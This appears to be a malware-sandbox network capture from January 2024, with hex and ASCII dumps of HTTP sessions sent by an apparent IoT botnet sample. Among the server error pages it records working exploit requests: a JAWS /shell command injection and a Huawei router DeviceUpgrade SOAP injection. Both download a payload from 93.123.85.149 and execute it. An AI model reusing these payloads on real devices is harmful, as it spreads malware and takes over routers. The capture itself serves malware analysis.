0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
                                                            Jan 26, 2024 15:31:12.704426050 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                            Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
                                                            Jan 26, 2024 15:31:12.704435110 CET1286INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72
                                                            Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
                                                            Jan 26, 2024 15:31:12.704442978 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
                                                            Jan 26, 2024 15:31:12.704458952 CET1286INData Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66
                                                            Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
                                                            Jan 26, 2024 15:31:12.704478025 CET1286INData Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33
                                                            Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
                                                            Jan 26, 2024 15:31:12.704490900 CET1096INData Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38
                                                            Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
                                                            Jan 26, 2024 15:31:12.704551935 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to vps60773.inmotionhosting.com's <a href="mailto:mac
                                                            Jan 26, 2024 15:31:12.704566002 CET394INData Raw: 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65
                                                            Data Ascii: om/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." />


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            27192.168.2.2335892188.51.163.7680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:12.594146013 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:13.125963926 CET126INHTTP/1.1 301 Moved Permanently
                                                            Content-length: 0
                                                            Location: https://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            28192.168.2.233513473.158.248.14880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:12.643415928 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:12.808532000 CET113INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            Content-Type: text/plain
                                                            Transfer-Encoding: chunked
                                                            Jan 26, 2024 15:31:12.808551073 CET33INData Raw: 42 0d 0a 42 61 64 20 52 65 71 75 65 73 74 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: BBad Request0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            29192.168.2.233925052.57.190.2580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:12.751291990 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            30192.168.2.2353160217.92.41.22780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:12.833745956 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:13.075262070 CET435INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Location: https://chf.firewall-gateway.com/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            31192.168.2.2336832154.80.190.13180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:12.938827038 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:13.234117031 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            32192.168.2.234607052.196.131.23280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:13.014919043 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:13.344608068 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            33192.168.2.2359336120.78.196.16580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:13.062668085 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:13.435693026 CET463INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:13 GMT
                                                            Server: Apache
                                                            Content-Length: 285
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            34192.168.2.2358848156.254.90.17737215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:13.283421993 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:14.825781107 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:16.649525881 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:20.296998024 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
